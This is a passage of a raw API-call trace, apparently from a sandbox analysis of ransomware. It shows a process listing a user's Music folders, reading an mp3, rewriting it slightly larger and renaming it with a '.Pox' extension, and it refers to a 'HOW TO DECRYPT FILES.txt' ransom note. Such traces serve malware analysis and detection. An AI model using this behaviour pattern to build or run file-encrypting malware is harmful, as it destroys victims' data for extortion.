lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8716a0, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x872f6440, ftLastAccessTime.dwHighDateTime=0x1d4d2c4, ftLastWriteTime.dwLowDateTime=0x872f6440, ftLastWriteTime.dwHighDateTime=0x1d4d2c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f08 [0041.084] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8716a0, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x872f6440, ftLastAccessTime.dwHighDateTime=0x1d4d2c4, ftLastWriteTime.dwLowDateTime=0x872f6440, ftLastWriteTime.dwHighDateTime=0x1d4d2c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.085] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf7c3210, ftCreationTime.dwHighDateTime=0x1d4cced, ftLastAccessTime.dwLowDateTime=0x35b28100, ftLastAccessTime.dwHighDateTime=0x1d4d07c, ftLastWriteTime.dwLowDateTime=0x35b28100, ftLastWriteTime.dwHighDateTime=0x1d4d07c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="B3hXqdSEmcNd0ro", cAlternateFileName="B3HXQD~1")) returned 1 [0041.085] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2168f970, ftCreationTime.dwHighDateTime=0x1d4cd81, ftLastAccessTime.dwLowDateTime=0xe6e8d2a0, ftLastAccessTime.dwHighDateTime=0x1d4c7ab, ftLastWriteTime.dwLowDateTime=0xe6e8d2a0, ftLastWriteTime.dwHighDateTime=0x1d4c7ab, nFileSizeHigh=0x0, nFileSizeLow=0xc483, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ga_2y993YyKn.mp3", cAlternateFileName="GA_2Y9~1.MP3")) returned 1 [0041.085] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3dc8c0, ftCreationTime.dwHighDateTime=0x1d4cc2d, ftLastAccessTime.dwLowDateTime=0x1b5f840, ftLastAccessTime.dwHighDateTime=0x1d4d226, ftLastWriteTime.dwLowDateTime=0x1b5f840, ftLastWriteTime.dwHighDateTime=0x1d4d226, nFileSizeHigh=0x0, nFileSizeLow=0xa98e, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLGiRV0jKMFW0.m4a", cAlternateFileName="RLGIRV~1.M4A")) returned 1 [0041.085] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.085] FindClose (in: hFindFile=0x405f08 | out: hFindFile=0x405f08) returned 1 [0041.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.085] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm", lpFilePart=0x0) returned 0x2f [0041.085] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\", lpFilePart=0x0) returned 0x30 [0041.085] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8716a0, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x872f6440, ftLastAccessTime.dwHighDateTime=0x1d4d2c4, ftLastWriteTime.dwLowDateTime=0x872f6440, ftLastWriteTime.dwHighDateTime=0x1d4d2c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f08 [0041.086] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc8716a0, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x872f6440, ftLastAccessTime.dwHighDateTime=0x1d4d2c4, ftLastWriteTime.dwLowDateTime=0x872f6440, ftLastWriteTime.dwHighDateTime=0x1d4d2c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.086] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf7c3210, ftCreationTime.dwHighDateTime=0x1d4cced, ftLastAccessTime.dwLowDateTime=0x35b28100, ftLastAccessTime.dwHighDateTime=0x1d4d07c, ftLastWriteTime.dwLowDateTime=0x35b28100, ftLastWriteTime.dwHighDateTime=0x1d4d07c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="B3hXqdSEmcNd0ro", cAlternateFileName="B3HXQD~1")) returned 1 [0041.086] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2168f970, ftCreationTime.dwHighDateTime=0x1d4cd81, ftLastAccessTime.dwLowDateTime=0xe6e8d2a0, ftLastAccessTime.dwHighDateTime=0x1d4c7ab, ftLastWriteTime.dwLowDateTime=0xe6e8d2a0, ftLastWriteTime.dwHighDateTime=0x1d4c7ab, nFileSizeHigh=0x0, nFileSizeLow=0xc483, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ga_2y993YyKn.mp3", cAlternateFileName="GA_2Y9~1.MP3")) returned 1 [0041.086] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3dc8c0, ftCreationTime.dwHighDateTime=0x1d4cc2d, ftLastAccessTime.dwLowDateTime=0x1b5f840, ftLastAccessTime.dwHighDateTime=0x1d4d226, ftLastWriteTime.dwLowDateTime=0x1b5f840, ftLastWriteTime.dwHighDateTime=0x1d4d226, nFileSizeHigh=0x0, nFileSizeLow=0xa98e, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLGiRV0jKMFW0.m4a", cAlternateFileName="RLGIRV~1.M4A")) returned 1 [0041.086] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3dc8c0, ftCreationTime.dwHighDateTime=0x1d4cc2d, ftLastAccessTime.dwLowDateTime=0x1b5f840, ftLastAccessTime.dwHighDateTime=0x1d4d226, ftLastWriteTime.dwLowDateTime=0x1b5f840, ftLastWriteTime.dwHighDateTime=0x1d4d226, nFileSizeHigh=0x0, nFileSizeLow=0xa98e, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLGiRV0jKMFW0.m4a", cAlternateFileName="RLGIRV~1.M4A")) returned 0 [0041.086] FindClose (in: hFindFile=0x405f08 | out: hFindFile=0x405f08) returned 1 [0041.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.086] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3", lpFilePart=0x0) returned 0x40 [0041.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\ga_2y993yykn.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.087] GetFileType (hFile=0x26c) returned 0x1 [0041.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.087] GetFileType (hFile=0x26c) returned 0x1 [0041.087] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0xc483 [0041.087] ReadFile (in: hFile=0x26c, lpBuffer=0x250b928, nNumberOfBytesToRead=0xc483, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x250b928*, lpNumberOfBytesRead=0x3ae4fc*=0xc483, lpOverlapped=0x0) returned 1 [0041.088] CloseHandle (hObject=0x26c) returned 1 [0041.103] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.103] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.103] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3", lpFilePart=0x0) returned 0x40 [0041.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\ga_2y993yykn.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.104] GetFileType (hFile=0x26c) returned 0x1 [0041.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.104] GetFileType (hFile=0x26c) returned 0x1 [0041.104] WriteFile (in: hFile=0x26c, lpBuffer=0x257d4d8*, nNumberOfBytesToWrite=0xc490, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x257d4d8*, lpNumberOfBytesWritten=0x3ae4f0*=0xc490, lpOverlapped=0x0) returned 1 [0041.106] CloseHandle (hObject=0x26c) returned 1 [0041.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3", lpFilePart=0x0) returned 0x40 [0041.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3.Pox", lpFilePart=0x0) returned 0x44 [0041.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.108] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\ga_2y993yykn.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2168f970, ftCreationTime.dwHighDateTime=0x1d4cd81, ftLastAccessTime.dwLowDateTime=0xe6e8d2a0, ftLastAccessTime.dwHighDateTime=0x1d4c7ab, ftLastWriteTime.dwLowDateTime=0x2aae9700, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xc490)) returned 1 [0041.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.108] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\ga_2y993yykn.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\Ga_2y993YyKn.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\ga_2y993yykn.mp3.pox")) returned 1 [0041.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0041.109] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro", lpFilePart=0x0) returned 0x3f [0041.112] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\", lpFilePart=0x0) returned 0x40 [0041.112] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf7c3210, ftCreationTime.dwHighDateTime=0x1d4cced, ftLastAccessTime.dwLowDateTime=0x35b28100, ftLastAccessTime.dwHighDateTime=0x1d4d07c, ftLastWriteTime.dwLowDateTime=0x35b28100, ftLastWriteTime.dwHighDateTime=0x1d4d07c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0041.112] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf7c3210, ftCreationTime.dwHighDateTime=0x1d4cced, ftLastAccessTime.dwLowDateTime=0x35b28100, ftLastAccessTime.dwHighDateTime=0x1d4d07c, ftLastWriteTime.dwLowDateTime=0x35b28100, ftLastWriteTime.dwHighDateTime=0x1d4d07c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.113] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5f030d0, ftCreationTime.dwHighDateTime=0x1d4d3ff, ftLastAccessTime.dwLowDateTime=0x7549fac0, ftLastAccessTime.dwHighDateTime=0x1d4d403, ftLastWriteTime.dwLowDateTime=0x7549fac0, ftLastWriteTime.dwHighDateTime=0x1d4d403, nFileSizeHigh=0x0, nFileSizeLow=0x2776, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdggPsA8JrqU.mp3", cAlternateFileName="IDGGPS~1.MP3")) returned 1 [0041.113] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa76aa6f0, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x71983ac0, ftLastAccessTime.dwHighDateTime=0x1d4cf8c, ftLastWriteTime.dwLowDateTime=0x71983ac0, ftLastWriteTime.dwHighDateTime=0x1d4cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J3JECENTIUTLx", cAlternateFileName="J3JECE~1")) returned 1 [0041.113] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54db45f0, ftCreationTime.dwHighDateTime=0x1d4ce7c, ftLastAccessTime.dwLowDateTime=0x1f7fd630, ftLastAccessTime.dwHighDateTime=0x1d4d2a7, ftLastWriteTime.dwLowDateTime=0x1f7fd630, ftLastWriteTime.dwHighDateTime=0x1d4d2a7, nFileSizeHigh=0x0, nFileSizeLow=0xad9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="r3c9is99-0a.mp3", cAlternateFileName="R3C9IS~1.MP3")) returned 1 [0041.114] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e45ee00, ftCreationTime.dwHighDateTime=0x1d4cfaa, ftLastAccessTime.dwLowDateTime=0x4aa2aa90, ftLastAccessTime.dwHighDateTime=0x1d4ccad, ftLastWriteTime.dwLowDateTime=0x4aa2aa90, ftLastWriteTime.dwHighDateTime=0x1d4ccad, nFileSizeHigh=0x0, nFileSizeLow=0xb44e, dwReserved0=0x0, dwReserved1=0x0, cFileName="sPjGz9oKaNiiOaEY.wav", cAlternateFileName="SPJGZ9~1.WAV")) returned 1 [0041.114] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf62c260, ftCreationTime.dwHighDateTime=0x1d4cdcc, ftLastAccessTime.dwLowDateTime=0x5596f6b0, ftLastAccessTime.dwHighDateTime=0x1d4d25f, ftLastWriteTime.dwLowDateTime=0x5596f6b0, ftLastWriteTime.dwHighDateTime=0x1d4d25f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vVtoiOUAe6UV8", cAlternateFileName="VVTOIO~1")) returned 1 [0041.114] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f5d420, ftCreationTime.dwHighDateTime=0x1d4c58f, ftLastAccessTime.dwLowDateTime=0xdb9f4c20, ftLastAccessTime.dwHighDateTime=0x1d4cb71, ftLastWriteTime.dwLowDateTime=0xdb9f4c20, ftLastWriteTime.dwHighDateTime=0x1d4cb71, nFileSizeHigh=0x0, nFileSizeLow=0x3302, dwReserved0=0x0, dwReserved1=0x0, cFileName="xN9vk HnnX26wwbtMhY.wav", cAlternateFileName="XN9VKH~1.WAV")) returned 1 [0041.114] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.115] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0041.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0041.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0041.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0041.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro", lpFilePart=0x0) returned 0x3f [0041.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\", lpFilePart=0x0) returned 0x40 [0041.115] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf7c3210, ftCreationTime.dwHighDateTime=0x1d4cced, ftLastAccessTime.dwLowDateTime=0x35b28100, ftLastAccessTime.dwHighDateTime=0x1d4d07c, ftLastWriteTime.dwLowDateTime=0x35b28100, ftLastWriteTime.dwHighDateTime=0x1d4d07c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0041.116] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf7c3210, ftCreationTime.dwHighDateTime=0x1d4cced, ftLastAccessTime.dwLowDateTime=0x35b28100, ftLastAccessTime.dwHighDateTime=0x1d4d07c, ftLastWriteTime.dwLowDateTime=0x35b28100, ftLastWriteTime.dwHighDateTime=0x1d4d07c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.116] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5f030d0, ftCreationTime.dwHighDateTime=0x1d4d3ff, ftLastAccessTime.dwLowDateTime=0x7549fac0, ftLastAccessTime.dwHighDateTime=0x1d4d403, ftLastWriteTime.dwLowDateTime=0x7549fac0, ftLastWriteTime.dwHighDateTime=0x1d4d403, nFileSizeHigh=0x0, nFileSizeLow=0x2776, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdggPsA8JrqU.mp3", cAlternateFileName="IDGGPS~1.MP3")) returned 1 [0041.116] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa76aa6f0, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x71983ac0, ftLastAccessTime.dwHighDateTime=0x1d4cf8c, ftLastWriteTime.dwLowDateTime=0x71983ac0, ftLastWriteTime.dwHighDateTime=0x1d4cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J3JECENTIUTLx", cAlternateFileName="J3JECE~1")) returned 1 [0041.117] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54db45f0, ftCreationTime.dwHighDateTime=0x1d4ce7c, ftLastAccessTime.dwLowDateTime=0x1f7fd630, ftLastAccessTime.dwHighDateTime=0x1d4d2a7, ftLastWriteTime.dwLowDateTime=0x1f7fd630, ftLastWriteTime.dwHighDateTime=0x1d4d2a7, nFileSizeHigh=0x0, nFileSizeLow=0xad9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="r3c9is99-0a.mp3", cAlternateFileName="R3C9IS~1.MP3")) returned 1 [0041.117] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e45ee00, ftCreationTime.dwHighDateTime=0x1d4cfaa, ftLastAccessTime.dwLowDateTime=0x4aa2aa90, ftLastAccessTime.dwHighDateTime=0x1d4ccad, ftLastWriteTime.dwLowDateTime=0x4aa2aa90, ftLastWriteTime.dwHighDateTime=0x1d4ccad, nFileSizeHigh=0x0, nFileSizeLow=0xb44e, dwReserved0=0x0, dwReserved1=0x0, cFileName="sPjGz9oKaNiiOaEY.wav", cAlternateFileName="SPJGZ9~1.WAV")) returned 1 [0041.117] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf62c260, ftCreationTime.dwHighDateTime=0x1d4cdcc, ftLastAccessTime.dwLowDateTime=0x5596f6b0, ftLastAccessTime.dwHighDateTime=0x1d4d25f, ftLastWriteTime.dwLowDateTime=0x5596f6b0, ftLastWriteTime.dwHighDateTime=0x1d4d25f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vVtoiOUAe6UV8", cAlternateFileName="VVTOIO~1")) returned 1 [0041.118] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f5d420, ftCreationTime.dwHighDateTime=0x1d4c58f, ftLastAccessTime.dwLowDateTime=0xdb9f4c20, ftLastAccessTime.dwHighDateTime=0x1d4cb71, ftLastWriteTime.dwLowDateTime=0xdb9f4c20, ftLastWriteTime.dwHighDateTime=0x1d4cb71, nFileSizeHigh=0x0, nFileSizeLow=0x3302, dwReserved0=0x0, dwReserved1=0x0, cFileName="xN9vk HnnX26wwbtMhY.wav", cAlternateFileName="XN9VKH~1.WAV")) returned 1 [0041.118] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: 